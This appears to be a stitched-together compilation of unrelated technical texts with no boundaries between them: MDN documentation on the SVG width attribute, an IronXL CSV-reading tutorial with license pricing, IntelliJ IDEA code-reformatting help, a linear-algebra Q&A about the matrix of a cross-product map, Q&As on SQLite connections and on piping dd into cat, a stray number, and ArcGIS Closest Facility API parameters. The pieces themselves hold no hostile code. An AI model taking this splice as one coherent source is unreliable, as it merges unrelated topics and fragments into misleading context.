See the CSS2 specification for the meanings of the unit identifiers. For properties defined in CSS2, a length unit identifier must be provided. For length values in SVG-specific properties and their corresponding presentation attributes, the length unit identifier is optional. If not provided, the length value represents a distance in the current user coordinate system. In presentation attributes for all properties, whether defined in SVG1.1 or in CSS2, the length identifier, if specified, must be in lower case.

When lengths are used in an SVG attribute, a <length> is instead defined as follows:

```
length ::= number ("em" | "ex" | "px" | "in" | "cm" | "mm" | "pt" | "pc" | "%")?
```

The unit identifiers in such <length> values must be in lower case.

Note that the non-property <length> definition also allows a percentage unit identifier. The meaning of a percentage length value depends on the attribute for which the percentage length value has been specified. Two common cases are:

• when a percentage length value represents a percentage of the viewport width or height
• when a percentage length value represents a percentage of the bounding box width or height on a given object

In the SVG DOM, <length> values are represented using SVGLength or SVGAnimatedLength objects.

Example

```
<?xml version="1.0"?>
<svg width="120" height="120"
     viewBox="0 0 120 120"
     xmlns="http://www.w3.org/2000/svg">

  <rect x="10" y="10" width="100" height="100"/>
</svg>
```

Elements

The following elements can use the width attribute, including <svg>, <rect>, <image>, <use>, <mask>, <pattern>, <filter> and <foreignObject>, among others.

© 2005–2018 Mozilla Developer Network and individual contributors.
Licensed under the Creative Commons Attribution-ShareAlike License v2.5 or later.
https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/width
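As an extra illustration of the percentage case described under Usage context (this example is mine, not from the original page) — here the rectangle's width resolves against the viewport width:

```
<svg width="300" height="100" xmlns="http://www.w3.org/2000/svg">
  <!-- 50% of the 300px viewport width = 150px -->
  <rect x="0" y="0" width="50%" height="100"/>
</svg>
```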
Read CSV File Using C# (Code Example Tutorial)
Updated June 29

This tutorial demonstrates how to read a CSV file using the IronXL C# library, without installing any additional interop, in a highly efficient and effective way.

How to read CSV files in C#

You must install IronXL before using it to read CSV files in MVC, ASP.NET, or .NET Core. Here is a basic summary of the process: in Visual Studio, select the Project menu, choose Manage NuGet Packages, search for IronXL.Excel, and click Install.

Figure 1: Install the IronXL package in the NuGet Package Manager.

IronXL is a great tool to use whenever you need to read CSV files in C#. The following code example shows how to read a CSV file that uses commas (or any other delimiter):

WorkBook workbook = WorkBook.LoadCSV("Weather.csv", fileFormat: ExcelFileFormat.XLSX, ListDelimiter: ",");
WorkSheet ws = workbook.DefaultWorkSheet;
workbook.SaveAs("Csv_To_Excel.xlsx");

The equivalent VB.NET:

Dim workbook As WorkBook = WorkBook.LoadCSV("Weather.csv", fileFormat:= ExcelFileFormat.XLSX, ListDelimiter:= ",")
Dim ws As WorkSheet = workbook.DefaultWorkSheet
workbook.SaveAs("Csv_To_Excel.xlsx")

Figure 2: The CSV data for this tutorial.

First, a WorkBook object is created. The WorkBook.LoadCSV method specifies the name of the CSV file to read, its format, and the delimiter used in the file; the parsed values are stored as an array of strings. Commas are used as the delimiter in this scenario. After that, a WorkSheet object is created; this is where the contents of the CSV file are stored. Finally, the file is renamed and saved in a new format. The data from the CSV file is then arranged in the worksheet in the form of a table. The result will look something like this:

Figure 3: The data converted to an Excel file.

Parsing CSV in C# .NET

CSV files present several difficulties: fields can contain line breaks, and fields can be wrapped in quotes, either of which prevents a naive string-splitting technique such as Split(",") from working. Instead, IronXL lets you customize the delimiter through an optional parameter of the LoadCSV method; see the LoadCSV API documentation for details.

C# records - Reading CSV data

In the following example, a foreach loop is used to iterate over the rows of the CSV file, and the Console is used to write the data to a log.

WorkBook workbook = WorkBook.LoadCSV("Weather.csv", fileFormat: ExcelFileFormat.XLSX, ListDelimiter: ",");
WorkSheet ws = workbook.DefaultWorkSheet;
DataTable dt = ws.ToDataTable(true); // parse the sheet into a DataTable
foreach (DataRow row in dt.Rows) // access rows
{
    for (int i = 0; i < dt.Columns.Count; i++) // access columns of the corresponding row
    {
        Console.Write(row[i] + " ");
    }
    Console.WriteLine();
}

The equivalent VB.NET:

Dim workbook As WorkBook = WorkBook.LoadCSV("Weather.csv", fileFormat:= ExcelFileFormat.XLSX, ListDelimiter:= ",")
Dim ws As WorkSheet = workbook.DefaultWorkSheet
Dim dt As DataTable = ws.ToDataTable(True) ' parse the sheet into a DataTable
For Each row As DataRow In dt.Rows ' access rows
    For i As Integer = 0 To dt.Columns.Count - 1 ' access columns of the corresponding row
        Console.Write(row(i) & " ")
    Next i
    Console.WriteLine()
Next row

Figure 4: Accessing the data in the CSV file and displaying it in the console.

Converting a CSV file to Excel format

The procedure is simple: load a CSV file and save it as an Excel file.

WorkBook workbook = WorkBook.LoadCSV("test.csv", fileFormat: ExcelFileFormat.XLSX, ListDelimiter: ",");
WorkSheet ws = workbook.DefaultWorkSheet;
workbook.SaveAs("CsvToExcelConversion.xlsx");

Reading and manipulating converted CSV files with IronXL

The IronXL WorkBook class represents an Excel workbook; use this class to open an Excel file in C#. The following code loads the desired Excel file into a WorkBook object:

// Load WorkBook
var workbook = WorkBook.Load(@"Spreadsheets\sample.xlsx");

The equivalent VB.NET:

' Load WorkBook
Dim workbook = WorkBook.Load("Spreadsheets\sample.xlsx")

A WorkBook can contain multiple WorkSheet objects; they are the worksheets of the Excel document. If the workbook contains worksheets, you can retrieve one by name as follows:

// Open Sheet for reading
var worksheet = workbook.GetWorkSheet("sheetnamegoeshere");

The equivalent VB.NET:

' Open Sheet for reading
Dim worksheet = workbook.GetWorkSheet("sheetnamegoeshere")

Code to read cell values:

// Read from ranges of cells elegantly.
foreach (var cell in worksheet["A2:A10"])
{
    Console.WriteLine("Cell {0} has value '{1}'", cell.AddressString, cell.Text);
}

The equivalent VB.NET:

' Read from ranges of cells elegantly.
For Each cell In worksheet("A2:A10")
    Console.WriteLine("Cell {0} has value '{1}'", cell.AddressString, cell.Text)
Next cell

The following code example updates formulas, or applies them to specific cells, after loading and reading the workbook and worksheet:

// Set formulas
worksheet["A1"].Formula = "Sum(B8:C12)";
worksheet["B8"].Formula = "=C9/C11";
worksheet["G30"].Formula = "Max(C3:C7)";
// Force recalculation of all formula values in all sheets.
workbook.EvaluateAll();

Conclusion and IronXL special offer

IronXL transforms CSV to Excel with just two lines of code, in addition to processing CSV in C#. With no need for Interop, using IronXL's Excel API is a piece of cake. IronXL also offers a wide range of functions for interacting with Excel at the WorkBook, WorkSheet, and Cell levels, such as converting between popular formats, formatting cell data, merging cells, inserting mathematical functions, and even managing charts and adding images.

You can go live without a watermark by using IronXL trial license keys. Licenses start at $599 and include a year of free support and updates. IronPDF, IronXL, IronOCR, IronBarcode, and IronWebscraper are all part of the Iron Software suite, and Iron Software lets you acquire the complete package at a reduced price: you can use all of those tools for the price of two. It is certainly an option worth exploring.
IntelliJ IDEA 2020.3 Help

Reformat and rearrange code

IntelliJ IDEA lets you reformat your code according to the requirements you've specified in the Code Style settings. However, if you use EditorConfig in your project, options specified in the .editorconfig file override the ones specified in the code style settings when you reformat the code.

To access the settings, in the Settings/Preferences dialog Ctrl+Alt+S, go to Editor | Code Style. See Configuring code style for details.

You can reformat a part of code, a whole file, a group of files, a directory, or a module. You can also exclude part of the code or some files from reformatting.

Reformat a code fragment in a file

1. In the editor, select the code fragment you want to reformat.
2. From the main menu, select Code | Reformat Code or press Ctrl+Alt+L.

Reformat a file

1. Either open your file in the editor and press Ctrl+Alt+Shift+L, or in the Project tool window, right-click the file and select Reformat Code.
2. In the dialog that opens, select any of the following reformatting options that you need:
• Optimize imports: select this option if you want to remove unused imports, add missing ones, or organize import statements. For more information, refer to the Optimize imports section.
• Rearrange entries: select this option if you need to rearrange your code based on the arrangement rules specified in the code style settings.
• Cleanup code: select this option to run the code cleanup inspections.
[Screenshot: Reformat Files dialog]
3. Click OK.

If you want to see the exact changes made to your code during reformatting, use the Local History feature.

Reformat a module or a directory

1. In the Project tool window, right-click a module or a directory and, from the context menu, select Reformat Code or press Ctrl+Alt+L.
2. In the dialog that opens, specify the reformatting options and click OK.
[Screenshot: Module or directory reformat dialog]

You can also apply filters to your code reformatting, such as specifying a scope or narrowing the reformatting to specific file types.

Reformat line indents

You can reformat line indents based on the specified settings.

1. While in the editor, select the necessary code fragment and press Ctrl+Alt+I.
2. If you need to adjust indentation settings, in the Settings/Preferences dialog Ctrl+Alt+S, go to Editor | Code Style.
3. On the appropriate language page, on the Tabs and Indents tab, specify the appropriate indent options and click OK.

Exclude code or a file from reformatting

You can exclude a group of files or part of code from reformatting.

1. In the Settings/Preferences dialog Ctrl+Alt+S, go to Editor | Code Style.
2. On the Formatter Control tab, select the Enable formatter markers in comments checkbox. The Scope area becomes active.
3. In the Scope area, click the Add icon to add a scope where you can specify the files that you want to exclude from reformatting.
[Screenshot: Scopes dialog]

If you try reformatting an excluded file, IntelliJ IDEA displays a popup notifying you that formatting for this file is disabled. If you need, click the link in the popup to open the Code Style settings page and change the exclusion scope.

Exclude code fragments from reformatting in the editor

1. In the Settings/Preferences dialog Ctrl+Alt+S, go to Editor | Code Style and select the Enable formatter markers in comments checkbox on the Formatter Control tab.
2. In the editor, at the beginning of the region that you want to exclude, create a line comment Ctrl+/ and type //@formatter:off; at the end of the region, again create a line comment and type //@formatter:on. (A short example appears at the end of this section.)

Keep existing formatting

You can select formatting rules which will be ignored when you reformat the code. For example, you can configure the IDE to keep simple methods and functions on one line, whereas normally they are expanded into multiple lines after code reformatting.

1. Go to Settings/Preferences | Editor | Code Style, select your programming language, and open the Wrapping and Braces tab.
2. In the Keep when reformatting section, select the formatting rules which you want to ignore and deselect those which should be applied.
3. Reformat your code (Ctrl+Alt+L).

IntelliJ IDEA will reformat your code in accordance with the current style settings, keeping existing formatting for the rules you've selected.

Rearrange code

You can rearrange your code according to the arrangement rules set in the Code Style page of the Settings/Preferences dialog. You can also create groups (aliases) of rules and refer to them when you create a matching rule.

[Screenshot: Code Style settings]
[Screenshot: Matching rules example]

Rearrange code entries

1. In the Settings/Preferences dialog Ctrl+Alt+S, go to Editor | Code Style.
2. Select a language for which you want to create arrangement rules.
3. On the Arrangement tab, specify the appropriate options such as grouping and matching rules. If you need to create an alias, click Configure matching rules aliases and, in the dialog that opens, add a group name and its rules.
[Screenshot: Rules Alias Definitions]
4. Click OK to save the changes.
5. In the editor, select the code entries you want to rearrange and, from the main menu, select Code | Rearrange Code.
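For reference, here is a minimal, hypothetical Java sketch of the formatter markers described in the procedure above; when Code | Reformat Code runs, the manually aligned block between the markers is left untouched:

public class FormatterMarkersDemo {
    //@formatter:off
    static final int[][] IDENTITY = {
            { 1, 0, 0 },
            { 0, 1, 0 },
            { 0, 0, 1 },
    };
    //@formatter:on

    // Code outside the markers is reformatted as usual.
    static int sum(int a, int b) { return a + b; }
}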
Question:

The example is given below:

[Screenshot: the worked example from the textbook]

But I do not understand the details of calculating $\phi_{BB}(\alpha_{v})$; could anyone explain this for me, please? The definition of $\phi_{BB}(\alpha_{v})$ is given below:

[Screenshot: the definition (Proposition 8.1) from the textbook]

EDIT: I mean, how does the definition of the given linear transformation affect the matrix?

Answer (accepted):

Part of the problem is that Proposition 8.1 is not a definition. It doesn't tell you what $\Phi_{BD}$ is, or how to compute it. It simply asserts existence. It's also not particularly well-stated as a proposition, since it asserts the existence of a family of isomorphisms based on pairs of bases $(B, D)$ on $V$ and $W$ respectively, but doesn't specify any way in which said isomorphisms differ. If you could find just one (out of the infinitely many) isomorphisms between $\operatorname{Hom}(V, W)$ and $M_{k \times n}(F)$ (call it $\phi$), then letting $\Phi_{BD} = \phi$ would technically satisfy the proposition, and constitute a proof!

Fortunately, I do know what the proposition is getting at. There is a very natural map $\Phi_{BD}$, taking a linear map $\alpha : V \to W$, to a $k \times n$ matrix. The fundamental, intuitive idea behind this map is the idea that linear maps are entirely determined by their action on a basis.

Let's say you have a linear map $\alpha : V \to W$, and a basis $B = (v_1, \ldots, v_n)$ of $V$. That is, every vector $v \in V$ can be expressed uniquely as a linear combination of the vectors $v_1, \ldots, v_n$. If we know the values of $\alpha(v_1), \ldots, \alpha(v_n)$, then we essentially know the value of $\alpha(v)$ for any $v$, through linearity. The process involves first finding the unique $a_1, \ldots, a_n \in F$ such that $$v = a_1 v_1 + \ldots + a_n v_n.$$ Then, using linearity, $$\alpha(v) = \alpha(a_1 v_1 + \ldots + a_n v_n) = a_1 \alpha(v_1) + \ldots + a_n \alpha(v_n).$$

As an example of this principle in action, let's say that you had a linear map $\alpha : \Bbb{R}^2 \to \Bbb{R}^3$, and all you knew about $\alpha$ was that $\alpha(1, 1) = (2, -1, 1)$ and $\alpha(1, -1) = (0, 0, 4)$. What would be the value of $\alpha(2, 4)$? To solve this, first express $$(2, 4) = 3(1, 1) + 1(1, -1)$$ (note that this linear combination is unique, since $((1, 1), (1, -1))$ is a basis for $\Bbb{R}^2$, and we could have done something similar for any vector, not just $(2, 4)$). Then, $$\alpha(2, 4) = 3\alpha(1, 1) + 1 \alpha(1, -1) = 3(2, -1, 1) + 1(0, 0, 4) = (6, -3, 7).$$

There is a converse to this principle too: if you start with a basis $(v_1, \ldots, v_n)$ for $V$, and pick an arbitrary list of vectors $(w_1, \ldots, w_n)$ from $W$ (not necessarily a basis), then there exists a unique linear transformation $\alpha : V \to W$ such that $\alpha(v_i) = w_i$. So, you don't even need to assume an underlying linear transformation exists! Just map the basis vectors wherever you want in $W$, without restriction, and there will be a (unique) linear map that maps the basis in this way.

That is, if we fix a basis $B = (v_1, \ldots, v_n)$ of $V$, then we can make a bijective correspondence between the linear maps from $V$ to $W$, and lists of $n$ vectors in $W$. The map $$\operatorname{Hom}(V, W) \to W^n : \alpha \mapsto (\alpha(v_1), \ldots, \alpha(v_n))$$ is bijective. This is related to the $\Phi$ maps, but we still need to go one step further.

Now, let's take a basis $D = (w_1, \ldots, w_m)$ of $W$. That is, each vector in $W$ can be uniquely written as a linear combination of $w_1, \ldots, w_m$. So, we have a natural map taking a vector $$w = b_1 w_1 + \ldots + b_m w_m$$ to its coordinate column vector $$[w]_D = \begin{bmatrix} b_1 \\ \vdots \\ b_m \end{bmatrix}.$$ This map is an isomorphism between $W$ and $F^m$; we lose no information if we choose to express vectors in $W$ this way. So, if we can express linear maps $\alpha : V \to W$ as a list of vectors in $W$, we could just as easily write this list of vectors in $W$ as a list of coordinate column vectors in $F^m$. Instead of thinking about $(\alpha(v_1), \ldots, \alpha(v_n))$, think about $$([\alpha(v_1)]_D, \ldots, [\alpha(v_n)]_D).$$ Equivalently, this list of $n$ column vectors could be thought of as a matrix: $$\left[\begin{array}{c|c|c} & & \\ [\alpha(v_1)]_D & \cdots & [\alpha(v_n)]_D \\ & & \end{array}\right].$$ This matrix is $\Phi_{BD}$! The procedure can be summed up as follows:

1. Compute $\alpha$ applied to each basis vector in $B$ (i.e. compute $\alpha(v_1), \ldots, \alpha(v_n)$), then
2. Compute the coordinate column vector of each of these transformed vectors with respect to the basis $D$ (i.e. $[\alpha(v_1)]_D, \ldots, [\alpha(v_n)]_D$), and finally,
3. Put these column vectors into a single matrix.

Note that step 2 typically takes the longest. For each $\alpha(v_i)$, you need to find (somehow) the scalars $b_{i1}, \ldots, b_{im}$ such that $$\alpha(v_i) = b_{i1} w_1 + \ldots + b_{im} w_m$$ where $D = (w_1, \ldots, w_m)$ is the basis for $W$. How to solve this will depend on what $W$ consists of (e.g. $k$-tuples of real numbers, polynomials, matrices, functions, etc), but it will almost always reduce to solving a system of linear equations in the field $F$.

As for why we represent linear maps this way, I think you'd better read further in your textbook. It essentially comes down to the fact that, given any $v \in V$, $$[\alpha(v)]_D = \Phi_{BD}(\alpha) \cdot [v]_B,$$ which reduces the (potentially complex) process of applying an abstract linear transformation on an abstract vector $v \in V$ down to simple matrix multiplication in $F$. I discuss this (with different notation) in this answer, but I suggest looking through your book first. Also, this answer has a nice diagram, but different notation again.

So, let's get into your example. In this case, $B = D = ((1, 0, 0), (0, 1, 0), (0, 0, 1))$, a basis for $V = W = \Bbb{R}^3$. We have a fixed vector $w = (w_1, w_2, w_3)$ (which is $v$ in the question, but I've chosen to change it to $w$ and keep $v$ as our dummy variable). Our linear map is $\alpha_w : \Bbb{R}^3 \to \Bbb{R}^3$ such that $\alpha_w(v) = w \times v$.

Let's follow the steps. First, we compute $\alpha_w(1, 0, 0), \alpha_w(0, 1, 0), \alpha_w(0, 0, 1)$: \begin{align*} \alpha_w(1, 0, 0) &= (w_1, w_2, w_3) \times (1, 0, 0) = (0, w_3, -w_2) \\ \alpha_w(0, 1, 0) &= (w_1, w_2, w_3) \times (0, 1, 0) = (-w_3, 0, w_1) \\ \alpha_w(0, 0, 1) &= (w_1, w_2, w_3) \times (0, 0, 1) = (w_2, -w_1, 0). \end{align*} Second, we need to write these vectors as coordinate column vectors with respect to $B$. Fortunately, $B$ is the standard basis; we always have, for any $v = (a, b, c) \in \Bbb{R}^3$, $$(a, b, c) = a(1, 0, 0) + b(0, 1, 0) + c(0, 0, 1) \implies [(a, b, c)]_B = \begin{bmatrix} a \\ b \\ c\end{bmatrix}.$$ In other words, we essentially just transpose these vectors to columns, giving us, $$\begin{bmatrix} 0 \\ w_3 \\ -w_2\end{bmatrix}, \begin{bmatrix} -w_3 \\ 0 \\ w_1\end{bmatrix}, \begin{bmatrix} w_2 \\ -w_1 \\ 0\end{bmatrix}.$$ Last step: put these in a matrix: $$\Phi_{BB}(\alpha_w) = \begin{bmatrix} 0 & -w_3 & w_2 \\ w_3 & 0 & -w_1 \\ -w_2 & w_1 & 0 \end{bmatrix}.$$

Comment: What about if we have 4 $2 \times 2$ matrices? What will be the second step, and what will be the dimension of $\Phi_{BB}$ in this case? – Secretly Sep 19 at 3:17

Comment: @hopefully Well, the second step really depends on the elements of the codomain $W$, not so much the dimensions of $V$ and $W$. It really comes from the fact that $D$ is a basis for $W$; in order for this to be true, there must be a proof that $D$ spans $W$, and in that proof must be instructions for how to express $\alpha(v_1), \ldots, \alpha(v_n)$ as linear combinations in terms of $D$. But, the details of this proof will depend on the specific vector space (and perhaps, the basis as well). I can't really say anything more specifically without a specific problem. – Theo Bendit Sep 19 at 4:04

Comment: @hopefully Now that I've seen (and answered) your latest question, I think I see what you mean. – Theo Bendit Sep 19 at 4:21

Answer:

With the equations of $\alpha_v$: Let $\:w={}^{\mathrm t\mkern-1.5mu}(x, y,z)$. The coordinates of $v\times w$ are obtained as the cofactors of the determinant (along the first row): $$\begin{vmatrix} \vec i&\vec j&\vec k \\ a_1&a_2 & a_3 \\ x&y&z \end{vmatrix} \rightsquigarrow \begin{pmatrix} a_2z-a_3y\\a_3x-a_1z \\a_1y-a_2x \end{pmatrix}=\begin{pmatrix} 0&-a_3&a_2\\a_3& 0 &-a_1 \\ -a_2 &a_1&0 \end{pmatrix}\begin{pmatrix} x \\y\\z \end{pmatrix}$$

Answer:

The details probably come in the proof of Theorem 8.1 (which you should read). Let $B = (v_1,\dots,v_n)$ and $D = (w_1,\dots,w_k)$ be the given bases. Suppose that $\alpha\in\operatorname{Hom}(V,W)$. For each $i$ in $1,\dots,n$ there exist scalars $\phi_{ij} \in F$ such that $$ \alpha(v_i) = \phi_{1i}w_1 + \phi_{2i}w_2 + \dots + \phi_{ki} w_k $$ Set $\Phi_{BD}(\alpha)$ to be the $k\times n$ matrix whose $(i,j)$-th entry is $\phi_{ij}$.

Now we come to angryavian's suggestion. Here $V = W = \mathbb{R}^3$, and $B = D = (e_1,e_2,e_3)$. Moreover, $\alpha(w) = v \times w$ for a fixed $v = \begin{bmatrix} a_1 \\ a_2 \\ a_3 \end{bmatrix}$. So you need to find the coefficients of $\alpha(e_1)$, $\alpha(e_2)$ and $\alpha(e_3)$ in the basis $(e_1,e_2,e_3)$.

Answer:

The first column of the matrix is $v \times \begin{bmatrix}1 \\ 0 \\ 0\end{bmatrix}$, the second column is $v \times \begin{bmatrix}0 \\ 1 \\ 0\end{bmatrix}$, and the third is $v \times \begin{bmatrix}0 \\ 0 \\ 1\end{bmatrix}$.

Comment: I mean, how does the definition of the given linear transformation affect the matrix? – Secretly Sep 18 at 18:58

Comment: If $B = \{e_1,\dots,e_n\}$ and $D = \{f_1,\dots,f_m\}$ and $T$ is a linear transformation, then $\Phi_{BD}(T)$ is obtained by applying $T$ to each element of $B$ and writing the result in terms of $f_1,\dots,f_m$. That is, if $$ T(e_j) = \sum_{i=1}^m a_{i,j}f_i, $$ then the $j$-th column of $\Phi_{BD}(T)$ is $$ \begin{bmatrix} a_{1,j} \\ a_{2,j} \\ \vdots \\ a_{m,j} \end{bmatrix}. $$ For example, $\alpha_v(e_1) = v \times e_1 = [0,a_3,-a_2]^T = 0e_1 + a_3e_2 -a_2e_3$ so the first column of $\Phi_{BB}(\alpha_v)$ is $[0,a_3,-a_2]^T$.
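Repeating this for $e_2$ and $e_3$ fills in the remaining columns, and, as a check tying the answers together, multiplying the resulting matrix by an arbitrary $w = {}^{\mathrm t}(x, y, z)$ reproduces the cross product:
$$\begin{pmatrix} 0&-a_3&a_2\\a_3& 0 &-a_1 \\ -a_2 &a_1&0 \end{pmatrix}\begin{pmatrix} x \\y\\z \end{pmatrix}=\begin{pmatrix} a_2z-a_3y\\a_3x-a_1z \\a_1y-a_2x \end{pmatrix}=v\times w.$$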
Question:

I have been under the understanding that database connections are best used and closed. However, with SQLite I'm not sure that this applies. I do all the queries with a Using Connection statement, so it is my understanding that I open a connection and then close it by doing this. When it comes to SQLite and optimal usage, is it better to open one permanent connection for the duration of the program being in use, or do I continue to use the method that I currently use?

I am using the database for a VB.net windows program with a fairly large DB of about 2 gig.

My current method of connection, for example:

Using oMainQueryR As New SQLite.SQLiteCommand
    oMainQueryR.CommandText = ("SELECT * FROM CRD")
    Using connection As New SQLite.SQLiteConnection(conectionString)
        Using oDataSQL As New SQLite.SQLiteDataAdapter
            oMainQueryR.Connection = connection
            oDataSQL.SelectCommand = oMainQueryR
            connection.Open()
            oDataSQL.FillSchema(crd, SchemaType.Source)
            oDataSQL.Fill(crd)
            connection.Close()
        End Using
    End Using
End Using

3 Answers

Answer (accepted):

As with all things database, it depends. In this specific case of sqlite, there are two "depends" you need to look at:

1. Are you the only user of the database?
2. When are implicit transactions committed?

For the first item, you probably want to open/close different connections frequently if there are other users of the database or if it's at all possible that more than one process will be hitting your sqlite database file at the same time.

For the second item, I'm not sure how sqlite specifically behaves. Some database engines don't commit implicit transactions until the connection is closed. If this is the case for sqlite, you probably want to be closing your connection a little more often.

The idea that connections should be short-lived in .Net applies mainly to Microsoft Sql Server, because the .Net provider for Sql Server is also able to take advantage of a feature known as connection pooling. Outside of Sql Server this advice is not entirely without merit, but it's not as much of a given.

Answer:

If it is a local application being used by only one user, I think it is fine to keep one connection opened for the life of the application.

Answer:

I think with most databases the "best used and closed" idea comes from the perspective of saving memory by ensuring you only have the minimum number of connections needed open. In reality, opening the connection can involve a large amount of overhead and should be done when needed. This is why managed server infrastructure (weblogic etc.) promotes the use of connection pooling. In this way you have N connections that are utilizable at any given time. You never "waste" resources, but you also aren't left with the responsibility of managing them at a global level.

Comment: It's not necessarily just about memory... it's also about a limited number of active connections permitted in total, about transaction log size, and about frequent transaction commits. – Joel Coehoorn Jan 18 at 21:30

Comment: I apologize, I'm a code monkey, but I'm trying to learn more about software architecture and optimization in my spare time. Am I correct in assuming that the number of commits and logging is more important at an I/O level? – Sparksis Jan 18 at 21:56
Question:

I start bash on Cygwin and type:

dd if=/dev/zero | cat /dev/null

It finishes instantly. When I type:

dd if=/dev/zero > /dev/null

it runs as expected and I can issue killall -USR1 dd to see the progress. Why does the former invocation finish instantly? Is it the same on a Linux box?

* Explanation of why I asked such a stupid question, and a possibly not-so-stupid question

I was compressing hdd images and some were compressed incorrectly. I ended up with the following script showing the problem:

while sleep 1 ; do killall -v -USR1 dd ; done &
dd if=/dev/zero bs=5000000 count=200 | gzip -c | gzip -cd | wc -c

wc should write 1000000000 at the end. The problem is that it does not on my machine:

bash-3.2$ dd if=/dev/zero bs=5000000 count=200 | gzip -c | gzip -cd | wc -c
13+0 records in
12+0 records out
60000000 bytes (60 MB) copied, 0.834 s, 71.9 MB/s
27+0 records in
26+0 records out
130000000 bytes (130 MB) copied, 1.822 s, 71.4 MB/s
200+0 records in
200+0 records out
1000000000 bytes (1.0 GB) copied, 13.231 s, 75.6 MB/s
1005856128

Is it a bug or am I doing something wrong once again?

Comment: Ah, a nomination for the UUOC award; partmaps.org/era/unix/award.html – Tom O'Connor Dec 23 '10 at 10:13

Comment: Thanks guys - from time to time everybody makes a mistake :) And thanks for the award :) – agsamek Dec 23 '10 at 13:27

4 Answers

Answer (accepted):

I can't think of any reason to do what you are trying to do, but the following way is the one you are looking for, I guess:

dd if=/dev/zero | cat > /dev/null

Answer:

AFAIK, your first command is not functional. You are trying to pipe the output of /dev/zero into a command that takes no input. cat /dev/null is just a command that outputs nothing; piping anything into it will therefore do nothing at all. When you use the stdout redirect, the output of /dev/zero gets written to the file in question (/dev/null, therefore nowhere).

Answer:

What dd if=/dev/zero | cat /dev/null does is: run cat /dev/null and attach its stdin to dd's stdout. The problem is that /dev/null is empty, so cat does what it is asked to do: open the empty file, write its contents to stdout, and finish. cat pipes output from stdin only when there are no files specified. cat /dev/null - will pipe the contents of /dev/null and stdin to stdout. As such, dd if=/dev/zero | cat /dev/null, apart from wasting a process, differs in nothing from cat /dev/null.

Answer:

I tried it on Cygwin and Ubuntu and got the correct result on Ubuntu. If I don't send a signal to dd, it works on Cygwin. I'm going to say that's a bug. When I did a tee to send the output to a file, it consisted of all zero bytes, but there were too many of them.

dd if=/dev/zero bs=5000000 count=200 | gzip -c | gzip -cd | tee dd.out | wc -c
0.570196
Closest Facility service with synchronous execution Finding the closest hospital to an accident, the closest police cars to a crime scene, and the closest store to a customer's address are all examples of problems that can be solved using the closest facility service. When finding the closest facilities, you can specify how many to find and whether the direction of travel is toward or away from them. Once you've found the closest facilities, you can display the best route to or from them and include the travel time, travel distance, and driving directions to each facility. The service can use current traffic conditions when determining the best routes. Additionally, you can specify an impedance cutoff beyond which the service should not search for a facility. For instance, you can set up a closest facility service to search for hospitals within 15 minutes' drive time of the site of an accident. Any hospitals that take longer than 15 minutes to reach will not be included in the results. The hospitals are referred to as facilities, and the accident is referred to as an incident. The service allows you to perform multiple closest facility analyses simultaneously. This means you can have multiple incidents and find the closest facility or facilities to each incident. Request URL You can make a request to the synchronous closest facility service using the following form: http://route.arcgis.com/arcgis/rest/services/World/ClosestFacility/NAServer/ClosestFacility_World/solveClosestFacility?parameters The closest facility service supports synchronous and asynchronous execution modes. Asynchronous and synchronous modes define how the application interacts with the service and gets the result. When using the synchronous execution mode, the application must wait for the request to finish and get the results. This execution mode is well-suited for requests that complete quickly (under 10 seconds). When using the asynchronous execution mode, the client must periodically check whether the service has finished execution and, once completed, get the result. While the service is executing, the application is available to do other things. This execution mode is well-suited for requests that take a long time to complete because it allows users to continue to interact with the application while the results are generated. While the service supports the same functionality irrespective of execution mode, the choice of the execution mode depends on the type of request your application has to make as well the size of problem you need to solve using the service. In synchronous mode, the service limits the maximum number of facilities to 100, the maximum number of incidents to 100, and the maximum number of facilities to find from each incident to 10. In asynchronous mode, the service limits the maximum number of facilities to 1,000, the maximum number of incidents to 1,000, and the maximum number of facilities to find from each incident to 100. So, for example, if you are finding the closest facilities from a total of 100 or fewer, you can use the synchronous execution mode. However, if your application needs to support adding more than 100 facilities in a request, you need to use the asynchronous execution mode. The request URL and the parameter names supported by the service when using asynchronous execution are different and described in the Closest Facility Service with Asynchronous Execution page. 
Caution: The maximum time an application can use the closest facility service when using the synchronous execution mode is 5 minutes (300 seconds). If your request does not complete within this time frame, it will time out and return a failure. Dive-in: The service works in all of the supported countries as listed in the data coverage page. One or more countries are grouped together to form a region. When you pass in your input incidents and facilities, the service determines the region containing all of the inputs based on the location of the first incident. The service does not support requests that span more than one region. Consequently, routes will be found only between those incidents and facilities that are in the same region as the first incident. Request parameters The closest facility request takes the following parameters. The only required parameters are incidents, facilities, token and f. The optional parameters have default values which will be used if the parameter is not specified in the request. Request parameters and description Parameter Description Required incidents Specify one or more locations from which the service searches for the nearby locations. These locations are referred to as incidents. Syntax: facilities Specify one or more locations that are searched for when finding the closest location. Syntax: returnCFRoutes Specify if the service should return routes. Values: true| false (default) token Provides the identity of a user that has the permissions to access the service. f Specify the response format. Values: json| pjson Optional travelMode Choose the mode of transportation for the analysis. Value: JSON object defaultTargetFacilityCount Specify the number of closest facilities to find per incident. travelDirection Specify whether you want to search for the closest facility as measured from the incident to the facility or from the facility to the incident. Values: esriNATravelDirectionToFacility(default) Values: see list defaultCutoff Specify the travel time or travel distance value at which to stop searching for facilities for a given incident. Values: null (default) timeOfDay Specify whether travel times should consider traffic conditions. timeOfDayIsUTC Specify the time zone or zones of the timeOfDay parameter. Values: false (default)| true timeOfDayUsage Specify whether thetimeOfDay parameter value represents the arrival or departure time for the routes. Values: esriNATimeOfDayUseAsStartTime (default) Values: see list useHierarchy Specify whether hierarchy should be used when finding the shortest paths. Values: true (default)| false restrictUTurns Restrict or permit the route from making U-turns at junctions. Values: esriNFSBAllowBacktrack (default) Values: see list impedanceAttributeName Specify the impedance. Values: TravelTime (default) Values: see list accumulateAttributeNames Specify whether the service should accumulate values other than the value specified for impedanceAttributeName. Values: Miles,Kilometers (default) restrictionAttributeNames Specify which restrictions should be honored by the service. Values: Avoid Carpool Roads, Avoid Express Lanes, Avoid Gates, Avoid Private Roads, Avoid Unpaved Roads, Driving an Automobile, Roads Under Construction Prohibited, Through Traffic Prohibited(default) Values: see list attributeParameterValues Specify additional values required by an attribute or restriction. 
